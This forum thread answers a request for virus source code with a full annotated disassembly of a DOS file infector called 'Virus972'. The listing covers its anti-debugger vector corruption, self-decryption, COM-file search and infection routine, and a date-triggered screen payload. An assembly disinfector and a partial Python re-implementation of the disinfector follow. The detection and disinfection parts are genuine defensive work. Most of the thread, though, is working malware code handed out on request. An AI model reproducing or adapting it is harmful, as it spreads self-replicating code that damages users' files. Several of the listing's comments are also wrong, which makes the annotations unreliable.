Author: yuntian108 [yuntian108] Forum user
Hello everyone, I have not been online for a few days and did not see your replies, sorry. I am learning assembly now; can you tell me where I can find virus source code?
Original poster, posted: 08/19 11:21

Reply: 286 [unique] Moderator
A few notes first:
1. This virus is for teaching only; anything anyone does with it has nothing to do with me.
2. It is a DOS virus.
3. It does not stay resident in memory.
4. The parts worth looking at are its anti-tracing and encryption techniques.
5. It only infects EXE and Command.com files, and only the first uninfected EXE file in the current directory, so nobody needs to worry.
6. If there is no uninfected EXE file in the current directory, it infects c:\Command.com.
7. A disinfection program is attached at the end.

Anti-tracing and encryption techniques:
1. Reverse instruction flow: memory overwriting is used so that the program's instructions execute backwards.
2. It corrupts the single-step and breakpoint interrupt vectors and, by hooking INT 1Ch, constantly monitors the vectors for changes to prevent static analysis; when it finds the vectors have been changed by hand, it automatically restores them to the values the virus set.
3. Dynamic encryption of the display; this move is obviously aimed at people who like to change the display strings of other people's programs.
4. Dynamic decryption of in-memory data.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Virus972 By IG, China,HeNan ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
4962:0100 E97102 JMP 0374
4962:033B 42 6C 75 65 4D 6F 6F 64 5B 48 61 72 6D 6C 65 73 73 5D ;start of the virus ;'BlueMood[Harmless]'
4962:034D 03 93 9D 95 4D 97 7C 73 BD ....M.|s.
4962:0356 28 63 (c
4962:0358 29 47 65 6E 69 75 73 26 49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:0368 4E 55 2E 58 69 6E 58 69 61 6E 67 2E NU.XinXiang.
4962:0374 9C PUSHF ;virus entry point (the body starts at 33B)
4962:0375 51 PUSH CX ;length of this file
4962:0376 FA CLI ;disable interrupts
4962:0377 E80000 CALL 037A
4962:037A 5B POP BX ;BX=IP=037A
4962:037B 81C34203 ADD BX,0342 ;? a buffer probably follows; BX=6BC
4962:037F 8BF3 MOV SI,BX
4962:0381 81EE8103 SUB SI,0381 ;SI=33B points to the start of the virus
4962:0385 BFDC00 MOV DI,00DC
4962:0388 90 NOP
4962:0389 03FB ADD DI,BX ;DI=798, just past the virus body
4962:038B B9CC03 MOV CX,03CC ;virus length (03CCh=972)
4962:038E 90 NOP
4962:038F FC CLD
4962:0390 F3 REPZ
4962:0391 A4 MOVSB ;copies itself to 798, past the virus body
4962:0392 8EDA MOV DS,DX ;DS=0 DI=B64
4962:0394 45 INC BP
4962:0395 83C26C ADD DX,+6C
4962:0398 B10A MOV CL,0A
4962:039A D3E5 SHL BP,CL ;BP=400, reads data from the BIOS area
4962:039C FEC9 DEC CL ;CL=9
4962:039E EB21 JMP 03C1
4962:03A0 90EB
4962:03A2 8BF5 MOV SI,BP ;SI=4 DS=0 (from 3CB)
4962:03A4 AD LODSW ;AX=DS:[SI]=0000:0004
4962:03A5 3104 XOR [SI],AX ;corrupts the single-step interrupt vector
4962:03A7 EB25 JMP 03CE
4962:03A9 90EB
4962:03AB 8BC3 MOV AX,BX ;BX=06BC (from 3D6)
4962:03AD 50 PUSH AX ;pushes the buffer start address
4962:03AE 8BEC MOV BP,SP ;SP=FFF8
4962:03B0 8BF3 MOV SI,BX
4962:03B2 81EEE202 SUB SI,02E2 ;SI=3DA
4962:03B6 06 PUSH ES
4962:03B7 1F POP DS ;DS=ES=0000
4962:03B8 8BFE MOV DI,SI ;SI=DI=3DA
4962:03BA B99CA7 MOV CX,A79C
4962:03BD EB37 JMP 03F6 ;enters the reverse-instruction-flow decoding area
4962:03BF 90EB
4962:03C1 8BFA MOV DI,DX ;DI=6C (from 39E)
4962:03C3 03FD ADD DI,BP ;DI=46C
4962:03C5 FEC9 DEC CL ;CL=8
4962:03C7 D3ED SHR BP,CL ;BP=4
4962:03C9 8B0D MOV CX,[DI] ;(0000:046C) CX=random number
4962:03CB EBD5 JMP 03A2
4962:03CD EB
4962:03CE 83C606 ADD SI,+06 ;SI=0C (from 3A7)
4962:03D1 AD LODSW ;SI=0E
4962:03D2 3104 XOR [SI],AX ;corrupts the INT 3H vector
4962:03D4 330D XOR CX,[DI] ;random number XOR random number
4962:03D6 74D3 JZ 03AB
4962:03D8 EBE7 JMP 03C1
4962:03DA C342E2FAC1AAAC328BFEB90281EE8BF3 ;42--2
4962:03EA 0390B9000251E9B900818B4E ;data for the reverse instruction flow
4962:03F6 AD LODSW ;after 15 passes this becomes JMP 0400 (from 3BD)
4962:03F7 50 PUSH AX
AX=08EB BX=06BC CX=A79C DX=006C SP=FFDA BP=FFF8 SI=03F8 DI=03F8
DS=4962 ES=4962 SS=4962 CS=4962 IP=03F6 NV UP EI PL NZ NA PE NC
4962:03F6 EB08 JMP 0400 ;08EB=50AD xor A79C xor FFDA
4962:03F8 33C1 XOR AX,CX ;CX=A79C
4962:03FA 33C4 XOR AX,SP
4962:03FC AB STOSW ;DI=2DA
4962:03FD EBF7 JMP 03F6 ;loop
4962:03FF EB
4962:0400 58 POP AX
4962:0401 FFE4 JMP SP ;SP=FFDC
AX=50AD BX=06BC CX=A79C DX=006C SP=FFDC BP=FFF8 SI=03F8 DI=03F8
DS=4962 ES=4962 SS=4962 CS=4962 IP=FFDC NV UP EI PL NZ NA PE NC
4962:FFDC 8B4E00 MOV CX,[BP+00] ;SS:FFF8=06BC
4962:FFDF 81E9B902 SUB CX,02B9
4962:FFE3 51 PUSH CX ;CX=403
4962:FFE4 B90003 MOV CX,0300 ;CX=768
4962:FFE7 90 NOP
4962:FFE8 8BF3 MOV SI,BX
4962:FFEA 81EEB902 SUB SI,02B9 ;SI=403H
4962:FFEE 8BFE MOV DI,SI ;decrypts DS:0403-0703
4962:FFF0 AC LODSB
4962:FFF1 32C1 XOR AL,CL
4962:FFF3 AA STOSB
4962:FFF4 E2FA LOOP FFF0 ;decrypts the program after the source jump point
AX=5044 BX=06BC CX=0000 DX=006C SP=FFDA BP=FFF8 SI=0703 DI=0703
DS=4962 ES=4962 SS=4962 CS=4962 IP=FFF6 NV UP EI PL NZ NA PE NC
4962:FFF6 C3 RET ;[SS]=4926 [SP]=0403, jumps back to the source point
AX=5044 BX=06BC CX=0000 DX=006C SP=FFDC BP=FFF8 SI=0703 DI=0703
DS=4962 ES=4962 SS=4962 CS=4962 IP=0403 NV UP EI PL NZ NA PE NC
4962:0403 8BE5 MOV SP,BP
4962:0405 58 POP AX ;the key value is stored at SS:BP, AX=6BC
4962:0406 BF0001 MOV DI,0100
4962:0409 8A874700 MOV AL,[BX+0047] ;[BX+0047]=[0703]=7C
4962:040D 347C XOR AL,7C
4962:040F 3005 XOR [DI],AL ;[100]=E9
4962:0411 47 INC DI ;DI=101
4962:0412 8B874800 MOV AX,[BX+0048] ;[704]=D81B
4962:0416 357619 XOR AX,1976
4962:0419 3105 XOR [DI],AX ;restores the JMP XXXX at the file head
4962:041B 33C0 XOR AX,AX
4962:041D 8ED8 MOV DS,AX
4962:041F BE0400 MOV SI,0004
4962:0422 AD LODSW ;reads the IP of INT 1H
4962:0423 3104 XOR [SI],AX ;corrupts INT 1H again
4962:0425 BE0C00 MOV SI,000C
4962:0428 AD LODSW
4962:0429 3104 XOR [SI],AX ;corrupts INT 3H
4962:042B 06 PUSH ES
4962:042C 1F POP DS ;DS=4962
4962:042D B93900 MOV CX,0039 ;57 bytes
4962:0430 90 NOP
4962:0431 8BF3 MOV SI,BX ;BX=6BC
4962:0433 2BF1 SUB SI,CX ;SI=683
4962:0435 BFDC00 MOV DI,00DC
4962:0438 90 NOP
4962:0439 03FB ADD DI,BX ;DI=798
4962:043B F3 REPZ
4962:043C A4 MOVSB ;copies "Blu...xiang.."
4962:043D 8BF3 MOV SI,BX ;SI=6BC
4962:043F B430 MOV AH,30 ;gets the DOS version
4962:0441 CD21 INT 21
4962:0443 3C02 CMP AL,02
4962:0445 7703 JA 044A ;above DOS 2.0
4962:0447 E91602 JMP 0660 ;probably the exit
4962:044A B42F MOV AH,2F ;gets the disk transfer area address
4962:044C CD21 INT 21
4962:044E 899C4F00 MOV [SI+004F],BX ;[SI+004F]=[70B]
4962:0452 8C845100 MOV [SI+0051],ES ;saves the address at [70D]
4962:0456 8BDE MOV BX,SI ;BX=6BC
4962:0458 BA9D00 MOV DX,009D
4962:045B 90 NOP
4962:045C 03D3 ADD DX,BX ;DX=759
4962:045E B41A MOV AH,1A ;sets the DTA address (at DS:DX)
4962:0460 CD21 INT 21 ;note: at program start the DTA is at PSP:0080
4962:0462 83C634 ADD SI,+34
4962:0465 90 NOP
4962:0466 56 PUSH SI ;SI=6F0
4962:002C 52 49 43 3E RIC>
4962:0467 8E062C00 MOV ES,[002C] ;DS:[002C]=4952, the environment block segment
4962:046B 33FF XOR DI,DI
4962:046D B98000 MOV CX,0080
4962:0470 5E POP SI ;SI=6F0
4962:0471 56 PUSH SI
4962:0472 AC LODSB
4962:0473 F2 REPNZ
4962:0474 AE SCASB ;is it 'PATH=*.COM'?
4962:0475 51 PUSH CX ;length
4962:0476 B90400 MOV CX,0004
4962:0479 F3 REPZ
4962:047A A6 CMPSB ;is '*.COM' in the environment block?
4962:047B E307 JCXZ 0484 ;yes
4962:047D 59 POP CX ;length
4962:047E E2F0 LOOP 0470 ;compares the next string
4962:0480 5E POP SI ;6F0
4962:0481 E9DC01 JMP 0660 ;restores and jumps to normal program execution
4962:0484 59 POP CX ;yes
4962:0485 5E POP SI ;?SI=6F0
4962:0486 89BF4D00 MOV [BX+004D],DI ;[6BC+4D]=[709] saves the environment block length
4962:048A BF5900 MOV DI,0059
4962:048D 90 NOP
4962:048E 03FB ADD DI,BX ;DI=715
4962:0490 89BF9900 MOV [BX+0099],DI ;[755]
4962:0494 EB33 JMP 04C9
4962:0496 83BC4D0000 CMP WORD PTR [SI+004D],+00 ;[742] (from 4F0)
4962:049B 7503 JNZ 04A0
4962:049D E96701 JMP 0607
4962:04A0 8BBF9900 MOV DI,[BX+0099] ;[755]
4962:04A4 8BB74D00 MOV SI,[BX+004D] ;[709]
4962:002C 52 49 43 3E RIC>
4962:04A8 8E1E2C00 MOV DS,[002C] ;DS=4952
4962:04AC AC LODSB
4962:04AD 3C3B CMP AL,3B ;';' ?':'
4962:04AF 7409 JZ 04BA ;? change of drive
4962:04B1 3C00 CMP AL,00
4962:04B3 7403 JZ 04B8 ;? end
4962:04B5 AA STOSB
4962:04B6 EBF4 JMP 04AC
4962:04B8 33F6 XOR SI,SI ;AL=0
4962:04BA 06 PUSH ES
4962:04BB 1F POP DS
4962:04BC 89B74D00 MOV [BX+004D],SI ;[709]
4962:04C0 807DFF5C CMP BYTE PTR [DI-01],5C ;'\'
4962:04C4 7403 JZ 04C9
4962:04C6 B05C MOV AL,5C
4962:04C8 AA STOSB
4962:04C9 89BF9B00 MOV [BX+009B],DI ;[757]=715 (jump from 494)
4962:04CD 8BF3 MOV SI,BX
4962:04CF 83C639 ADD SI,+39 ;SI=6BC+39=6F5
4962:04D2 90 NOP
4962:04D3 1E PUSH DS
4962:04D4 07 POP ES
4962:04D5 B90600 MOV CX,0006 ;'*.COM',0
4962:04D8 F3 REPZ ;DI=715
4962:04D9 A4 MOVSB ;copies "*.COM",0
4962:04DA 8BF3 MOV SI,BX ;SI=6BC
4962:04DC B44E MOV AH,4E ;find first matching file
4962:04DE 8B979900 MOV DX,[BX+0099] ;DS:DX (=755) is the ASCIZ string
4962:04E2 B90300 MOV CX,0003 ;attributes: hidden and read-only
4962:04E5 CD21 INT 21
4962:04E7 EB05 JMP 04EE
4962:04E9 90 NOP
4962:04EA B44F MOV AH,4F ;find next matching file
4962:04EC CD21 INT 21
4962:04EE 7302 JNB 04F2 ;on error (from 4E7)
4962:04F0 EBA4 JMP 0496 ;
4962:04F2 8B87B300 MOV AX,[BX+00B3] ;open error [7F6] (from 4EE)
4962:04F6 241E AND AL,1E ;
4962:04F8 3C1E CMP AL,1E
4962:04FA 74EE JZ 04EA ;if it does not match
4962:04FC 83BFB7000D CMP WORD PTR [BX+00B7],+0D ;[773]
4962:0501 72E7 JB 04EA
4962:0503 81BFB70000F0 CMP WORD PTR [BX+00B7],F000 ;[773]
4962:0509 77DF JA 04EA
4962:050B BE4000 MOV SI,0040
4962:050E 90 NOP
4962:050F 03F3 ADD SI,BX ;SI=6FC
4962:0511 BFBB00 MOV DI,00BB
4962:0514 90 NOP
4962:0515 03FB ADD DI,BX ;DI=777
4962:0517 B90700 MOV CX,0007
4962:051A F3 REPZ
4962:051B A6 CMPSB ;transfers 'COMMAND'
4962:051C 0BC9 OR CX,CX
4962:051E 74CA JZ 04EA ;looks for the next file
4962:0520 8BF3 MOV SI,BX
4962:0522 B82435 MOV AX,3524 ;gets the INT 24H vector
4962:0525 CD21 INT 21
4962:0527 06 PUSH ES
4962:0528 53 PUSH BX ;saves it on the stack
4962:0529 8BDE MOV BX,SI
4962:052B 1E PUSH DS
4962:052C 07 POP ES
4962:052D BA3100 MOV DX,0031
4962:0530 03D3 ADD DX,BX ;DS:DX=4962:06ED
4962:0532 B82425 MOV AX,2524 ;sets the INT 24H vector
4962:0535 CD21 INT 21 ;its handler just sets AL=0
4962:0537 8BBF9B00 MOV DI,[BX+009B] ;[757]
4962:053B 81C6BB00 ADD SI,00BB ;SI=6BC+BB=777
4962:053F AC LODSB
4962:0540 AA STOSB
4962:0541 3C00 CMP AL,00
4962:0543 75FA JNZ 053F
4962:0545 B80043 MOV AX,4300 ;CX: 0 read-only 1 hidden 2 system 3 volume label 4 directory
4962:0548 8B979900 MOV DX,[BX+0099] ;ASCIZ <== [755]
4962:054C CD21 INT 21 ;gets the file attributes
4962:054E 898F5700 MOV [BX+0057],CX ;[713] saves the file attributes
4962:0552 B80143 MOV AX,4301 ;DS:DX is the ASCIZ string
4962:0555 B92000 MOV CX,0020 ;? reserved ? used as a marker
4962:0558 CD21 INT 21 ;sets the file attributes
4962:055A B8023D MOV AX,3D02 ;opens for read/write
4962:055D CD21 INT 21
4962:055F 7303 JNB 0564 ;success
4962:0561 E98D00 JMP 05F1 ;on failure restores the attributes and runs the display part
4962:0564 8BF3 MOV SI,BX ;
4962:0566 8BD8 MOV BX,AX ;file handle
4962:0568 B80057 MOV AX,5700 ;gets the file date and time
4962:056B CD21 INT 21 ;BX: handle CX: time DX: date
4962:056D 898C5300 MOV [SI+0053],CX ;[70F]
4962:0571 89945500 MOV [SI+0055],DX ;[711]
4962:0575 B43F MOV AH,3F ;reads from the file
4962:0577 B90300 MOV CX,0003
4962:057A BAA404 MOV DX,04A4 ;DS:DX buffer
4962:057D 90 NOP
4962:057E 03D6 ADD DX,SI ;?DX=6BC+4A4=B60
4962:0580 CD21 INT 21 ;BX: handle
4962:0582 7256 JB 05DA ;on failure restores time/date and closes
4962:0584 3D0300 CMP AX,0003
4962:0587 7551 JNZ 05DA ;if the read failed (or the length is under 3 bytes)
4962:0589 33C9 XOR CX,CX
4962:058B 33D2 XOR DX,DX
4962:058D B80242 MOV AX,4202 ;moves the file pointer to the end of the file
4962:0590 CD21 INT 21
4962:0592 7246 JB 05DA ;failure
4962:0594 8BC8 MOV CX,AX ;saves the file length
4962:0596 053600 ADD AX,0036 ;AX points to the virus entry (the first 36h bytes are Blue...)
4962:0599 89844B00 MOV [SI+004B],AX ;[708]
4962:059D 56 PUSH SI ;SI=6BC
4962:059E 81C6A504 ADD SI,04A5 ;
4962:05A2 357619 XOR AX,1976
4962:05A5 3104 XOR [SI],AX
4962:05A7 4E DEC SI
4962:05A8 803495 XOR BYTE PTR [SI],95
4962:05AB 5E POP SI
4962:05AC B9CC03 MOV CX,03CC ;972
4962:05AF 90 NOP
4962:05B0 BADC00 MOV DX,00DC
4962:05B3 90 NOP
4962:05B4 03D6 ADD DX,SI ;DS:DX: buffer
4962:05B6 B440 MOV AH,40 ;writes to the file
4962:05B8 CD21 INT 21
4962:05BA 721E JB 05DA ;close and exit
4962:05BC 3DCC03 CMP AX,03CC
4962:05BF 90 NOP
4962:05C0 7518 JNZ 05DA ;were 972 bytes written?
4962:05C2 33C9 XOR CX,CX
4962:05C4 33D2 XOR DX,DX
4962:05C6 B80042 MOV AX,4200 ;moves the pointer to the start of the file
4962:05C9 CD21 INT 21
4962:05CB 720D JB 05DA ;failure
4962:05CD B90300 MOV CX,0003 ;byte count
4962:05D0 BA4A00 MOV DX,004A
4962:05D3 90 NOP
4962:05D4 03D6 ADD DX,SI ;DS:DX buffer
4962:05D6 B440 MOV AH,40 ;writes to the file: JMP XXXX
4962:05D8 CD21 INT 21
4962:05DA 8B8C5300 MOV CX,[SI+0053] ;old time
4962:05DE 8B945500 MOV DX,[SI+0055] ;old date
4962:05E2 83C91E OR CX,+1E
4962:05E5 83E1FE AND CX,-02 ;CX: new time ==> infection marker
4962:05E8 B80157 MOV AX,5701 ;sets the file date and time
4962:05EB CD21 INT 21
4962:05ED B43E MOV AH,3E ;closes the file
4962:05EF CD21 INT 21
4962:05F1 8B8C5700 MOV CX,[SI+0057] ;restores the original attributes [713]
4962:05F5 8B949900 MOV DX,[SI+0099] ;DS:DX (=755) is the ASCIZ string
4962:05F9 B80143 MOV AX,4301 ;restores the file attributes
4962:05FC CD21 INT 21
4962:05FE 5A POP DX
4962:05FF 1F POP DS
4962:0600 B82425 MOV AX,2524 ;restores the INT 24H vector
4962:0603 CD21 INT 21
4962:0605 06 PUSH ES
4962:0606 1F POP DS
4962:0607 8B944F00 MOV DX,[SI+004F] ;[70B] (from 49D)
4962:060B 8E9C5100 MOV DS,[SI+0051] ;DS:DX (=70D) is the DTA address
4962:060F B41A MOV AH,1A ;restores the disk transfer (DTA) address
4962:0611 CD21 INT 21
4962:0613 06 PUSH ES
4962:0614 1F POP DS
4962:0615 B42A MOV AH,2A ;gets the system date
4962:0617 CD21 INT 21 ;CX: year
4962:0619 80FE04 CMP DH,04 ;DH: April
4962:061C 7217 JB 0635
4962:061E 7705 JA 0625
4962:0620 80FA0D CMP DL,0D ;DL: the 13th
4962:0623 7210 JB 0635
4962:0625 80FE07 CMP DH,07 ;July
4962:0628 770B JA 0635
4962:062A 7205 JB 0631
4962:062C 80FA0C CMP DL,0C ;DL: December
4962:062F 7704 JA 0635
4962:0631 3C05 CMP AL,05 ;AL: Friday (DOS 1.10+)
4962:0633 7404 JA 0639
4962:0635 3C06 CMP AL,06 ;Saturday
4962:0637 7527 JNZ 0660
4962:0639 B42C MOV AH,2C ;gets the system time
4962:063B CD21 INT 21
4962:063D 81F90D10 CMP CX,100D ;CH: hour CL: minute
4962:0641 721D JB 0660
4962:0643 8BDE MOV BX,SI
4962:0645 B81000 MOV AX,0010
4962:0648 8EC0 MOV ES,AX
4962:064A BF0301 MOV DI,0103
4962:064D B93100 MOV CX,0031 ;49 bytes
4962:0650 F3 REPZ
4962:0651 A4 MOVSB ;moves them to 0000:0203
4962:0652 1E PUSH DS
4962:0653 07 POP ES
4962:0654 8ED8 MOV DS,AX ;DS=0010
4962:0656 BA0501 MOV DX,0105 ;DS:DX new interrupt handler
4962:0659 B81C25 MOV AX,251C ;sets the INT 1CH system timer interrupt
4962:065C CD21 INT 21 ;at 0000:0205 (i.e. INT 80H-9CH)
4962:065E 06 PUSH ES
4962:065F 1F POP DS
4962:0660 B92F03 MOV CX,032F ;815 ? exit
4962:0663 90 NOP
4962:0664 8BFB MOV DI,BX ;BX=6BC
4962:0666 81EF8103 SUB DI,0381 ;DI=33B SI=6BC
4962:066A F3 REPZ
4962:066B AA STOSB ;probably self-destruction
4962:066C 33DB XOR BX,BX
4962:066E 33D2 XOR DX,DX
4962:0670 33F6 XOR SI,SI
4962:0672 33FF XOR DI,DI
4962:0674 33ED XOR BP,BP ;restores the original program environment
4962:0676 59 POP CX ;CX=length of this file (pushed at program start)
4962:0677 81E9CC03 SUB CX,03CC ;CX=original file length 23B
4962:067B 9D POPF ;(the flags pushed at the start)
4962:067C B80001 MOV AX,0100
4962:067F 50 PUSH AX
4962:0680 33C0 XOR AX,AX
4962:0682 C3 RET ;jumps to ????:0100 (to the normal program)
4962:0680 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm
4962:0690 6C 65 73 73 5D less]
4962:0695 03939D95 ADD DX,[BP+DI+959D]
4962:0699 4D DEC BP
4962:069A 97 XCHG DI,AX
4962:069B 7C73BD JL 0710
4962:0690 28 63 (c
4962:06A0 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:06B0 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang.
;a buffer probably follows
4962:06BC D01A RCR BYTE PTR [BP+SI],1
4962:06BE 2E CS:
4962:06BF FF0E0301 DEC WORD PTR [0103]
4962:06C3 2E CS:
4962:06C4 833E030100 CMP WORD PTR [0103],+00
4962:06C9 7521 JNZ 06EC
4962:06CB 50 PUSH AX ;probably the start of the new interrupt handler
4962:06CC 53 PUSH BX
4962:06CD 1E PUSH DS ;DS:DX address of the file control block (FCB)
4962:06CE B40F MOV AH,0F ;opens a file with an FCB
4962:06D0 CD10 INT 10
4962:06D2 3C03 CMP AL,03 ;?AL=0 success, AL=FF failure
4962:06D4 750C JNZ 06E2
4962:06D6 B800B8 MOV AX,B800
4962:06D9 8ED8 MOV DS,AX ;display buffer start
4962:06DB 33DB XOR BX,BX
4962:06DD B8031C MOV AX,1C03 ;brown heart on a blue background
4962:06E0 8907 MOV [BX],AX ;shown in the top-left corner of the screen
4962:06E2 2E CS:
4962:06E3 C7060301D01A MOV WORD PTR [0103],1AD0 ;possibly the infection marker
4962:06E9 1F POP DS
4962:06EA 5B POP BX
4962:06EB 58 POP AX
4962:06EC CF IRET ;end of the new interrupt handler
4962:06ED 32C0 XOR AL,AL ;new INT 24H handler
4962:06EF CF IRET ;end of the new interrupt handler
4962:06F0 50 41 54 48 3D ;'PATH='
4962:06F5 2A 2E 43 4F 4D 00 ;'*.COM',0 (ASCIZ)
4962:06FB 00 43 4F 4D 4D ;0,'COMMAND'
4962:0703 7C ;data (from 4962:0409): the original file head's jmp xxxx
4962:0704 D81B ;data (from 4962:0412): note: already encrypted here
4962:0706 E9 SBB BP,CX
4962:0707 F4 HLT
4962:0708 74 ;length+36 (from 599)
4962:0709 0780 ;environment block length (from 486)
4962:070B 3E96 ;saved disk transfer offset (from 44E)
4962:070D 0E00 ;saved disk transfer segment (from 452)
4962:070F 7401 ;file time
4962:0711 46FF ;file date
4962:0713 FF46 ;saved file attributes
4962:0714 F4 INC WORD PTR [BP-0C]
4962:0715 EB03895EF4E9 ;stores '*.COM',0 (from 4D8)
4962:071B 7F00 JMP 079C
4962:071D 895EF4 MOV [BP-0C],BX
4962:0720 85DB TEST BX,BX
4962:0722 7C46 JL 076A
4962:0724 89F2 MOV DX,SI
4962:0726 2B56F4 SUB DX,[BP-0C]
4962:0729 83FA01 CMP DX,+01
4962:072C 7E18 JLE 0746
4962:072E 8B46F4 MOV AX,[BP-0C]
4962:0731 40 INC AX
4962:0732 8B5E0E MOV BX,[BP+0E]
4962:0735 01C3 ADD BX,AX
4962:0737 1E PUSH DS
4962:0738 53 PUSH BX
4962:0739 8B5E0E MOV BX,[BP+0E]
4962:073C 035EF4 ADD BX,[BP-0C]
4962:073F 1E PUSH DS
4962:0740 53 PUSH BX
4962:0741 4A DEC DX
4962:0742 52 PUSH DX
4962:0743 E81E17 CALL 1E64
4962:0746 89F0 MOV AX,SI
4962:0748 2B46F4 SUB AX,[BP-0C]
4962:074B 85C0 TEST AX,AX
4962:074D 7E1B JLE 076A
4962:074F 4E DEC SI
4962:0750 EB18 JMP 076A
4962:0752 8B76F4 MOV SI,[BP-0C]
4962:0755 EB13 ;DI=715 (from 490); the filename string to search for is also stored here (from 4DE)
4962:0757 31F6 ;saved DI=715 (from 4C9)
;disk transfer area, FCB structure (from 45E)
4962:0759 EB ;drive of the file
4962:075A 07C746F40000EB3A ;file name
4962:0762 8976F4 ;extension
4962:0765 EB35 ;current block of the file
4962:0767 E8CA ;current record length of the file
4962:0769 B0EB30C4 ;file length
4962:076D 1EAA ;file date
4962:076F 0726837F20007E2226C4 ;set by the system
4962:0779 7F ;set before a sequential read
4962:070A 1C268B05 ;set before a random read (stores "COMMAND", from 51B)
4962:077E 26 ES:
4962:077F 8B5502 MOV DX,[DI+02]
4962:0782 83C00A ADD AX,+0A
4962:0785 52 PUSH DX
4962:0786 50 PUSH AX
4962:0787 8E06AC21 MOV ES,[21AC]
4962:078B 26 ES:
4962:078C C47F1C LES DI,[BX+1C]
4962:078F 26 ES:
4962:0790 C41D LES BX,[DI]
4962:0792 26 ES:
4962:0793 FF7708 PUSH [BX+08]
4962:0796 E8 5F
4962:0798 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm
4962:07A5 6C 65 73 73 5D 03 93 9D-95 4D 97 7C 73 BD 28 63 less]....M.|s.(c
4962:07B5 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:07C5 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang.
;(moved here from 43C)
4962:07D1 9C PUSHF
4962:07D2 51 PUSH CX
4962:07D3 90 NOP
4962:07D4 E80000 CALL 07D7
4962:07D7 5B POP BX
4962:0100 E9 71 02 00 ;data (from 40F)
4962:002C 52 49 43 3E RIC> ;(from 467)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Kill972 By 286, China,HeNan ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CODE SEGMENT
 org 100h
 assume cs:CODE,ds:CODE,es:CODE,ss:CODE
MAIN PROC NEAR
 jmp begin
MSG0 db 'Please Input FileName:$'
FNAME db 50
 db 0
 db 50 dup (0)
MSG1 db 0dh,0ah,'No Virus in file!',0dh,0ah,'$'
MSG2 db 0dh,0ah,'Find Virus!',0dh,0ah,'$'
MSG3 db 0dh,0ah,'Kill Successfully!',0dh,0ah,'$'
ERROR db 0dh,0ah,'File Not Found!',0dh,0ah,'$'
HANDLE dw 0
NUMB1 dw 0 ;File Length
NUMB2 dw 0 ;OldFile Length
VirusLength dw 972
DISPSTR MACRO ADDR
 lea dx,ADDR
 mov ah,9
 int 21h
 ENDM
begin:
 DISPSTR MSG0 ;"Input FileName"
 mov ah,0ah ;Keyboard buffer input
 lea dx,FNAME ;ds:dx=>Buffer
 int 21h
 lea bx,FNAME+1
tail0:
 inc bx
 cmp byte ptr [bx],0dh
 jnz tail0
 mov byte ptr [bx],0 ;Create ASCIIZ
 mov ax,3d02h
 lea dx,FNAME+2
 int 21h ;Open with Read & Write
 jc er ;"File not Found"
 mov bx,ax
 mov HANDLE,ax
 mov ax,4202h ;Move Pointer to End of File
 xor cx,cx
 xor dx,dx
 int 21h
 cmp ax,VirusLength ;Shorter Than VirusLength: "No Virus"
 jbe no1
 mov NUMB1,ax ;Byte Numbers in fact
 sub ax,VirusLength
 mov NUMB2,ax ;OldFile Length
 mov ax,4200h ;Move Pointer to head of File
 xor cx,cx
 xor dx,dx
 int 21h
 mov ah,3fh
 mov cx,NUMB1
 lea dx,Buffer
 int 21h
 mov ah,3eh
 int 21h ;Close file
 lea di,Buffer
 add di,NUMB1
 dec di
 cmp word ptr [di-971],6c42h
 jnz no1
 cmp word ptr [di-969],06575h
 jnz no1
 cmp byte ptr [di],0e9h ;Signature of the virus
 jnz no1
 jmp v
er:
 jmp err
v:
 DISPSTR MSG2 ;"Found Virus"
 lea si,Buffer
 mov ax,[di-2]
 xor ax,1976h
 xor [si+1],ax
 mov al,[di-3]
 xor al,7ch
 xor [si],al
 jmp mm
no1:
 jmp no
mm:
 lea dx,FNAME+2
 mov ax,3c00h ;Create
 mov cx,0 ;Attribute
 mov dx,offset FNAME+2 ;DS:DX=>ASCIIZ
 int 21h
 mov bx,ax
 mov ah,40h ;Write
 mov cx,NUMB2 ;Length
 lea dx,Buffer
 int 21h
 mov ah,3eh ;Close
 int 21h
 DISPSTR MSG3 ;"Kill Successfully"
 jmp exit
no:
 push cs
 pop ds
 DISPSTR MSG1 ;"Not infected"
 mov bx,HANDLE
 mov ax,3e00h ;Close
 int 21h
 jmp exit
err:
 DISPSTR ERROR ;"File not Found"
exit:
 mov ax,4c00h
 int 21h
Buffer db 0
MAIN ENDP
CODE ENDS
 END MAIN
Floor 1, posted: 08/20 09:50
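The header repair in Kill972 is only a few instructions, so it is easy to miss what it actually relies on: the infector stores the host's first byte XOR 95h and the next word XOR (rel16 XOR 1976h) in the last four bytes of the appended body, and the cleaner reverses exactly that arithmetic (95h XOR 7Ch = E9h, the JMP opcode it wrote over the first byte). The following Python is an added example, not code from the thread or from either program: it re-implements the checks and repair Kill972 performs, plus the file-time marker test at 04F6/05E2, and runs them on a constructed sample whose appended body is inert filler laid out as the listing describes. Offsets and keys are taken from the listing; `make_sample_infected` and `SAMPLE_HOST` are constructed fixtures.

```python
# Added example: Kill972's detection and header repair, re-implemented in Python
# and exercised on a constructed fixture. Keys and offsets come from the listing.

VIRUS_LENGTH = 972        # 03CCh bytes appended to the host
HEAD_WORD_KEY = 0x1976    # word key used at 0416 and in Kill972
HEAD_BYTE_KEY = 0x7C      # byte key used at 040D and in Kill972
STORE_BYTE_KEY = 0x95     # byte key used at 05A8 when the header copy is stored


def is_infected(data: bytes) -> bool:
    """Kill972's test: longer than 972 bytes, 'Bl','ue' at the start of the
    appended body and E9h as the body's last byte."""
    if len(data) <= VIRUS_LENGTH:
        return False
    body = data[-VIRUS_LENGTH:]
    return body[0:2] == b"Bl" and body[2:4] == b"ue" and body[-1] == 0xE9


def disinfect(data: bytes) -> bytes:
    """Undo the header patch exactly as Kill972 does: [di-3] XOR 7Ch is XORed
    into byte 0, [di-2] XOR 1976h into bytes 1..2, then the 972-byte body is cut."""
    if not is_infected(data):
        raise ValueError("virus signature not present")
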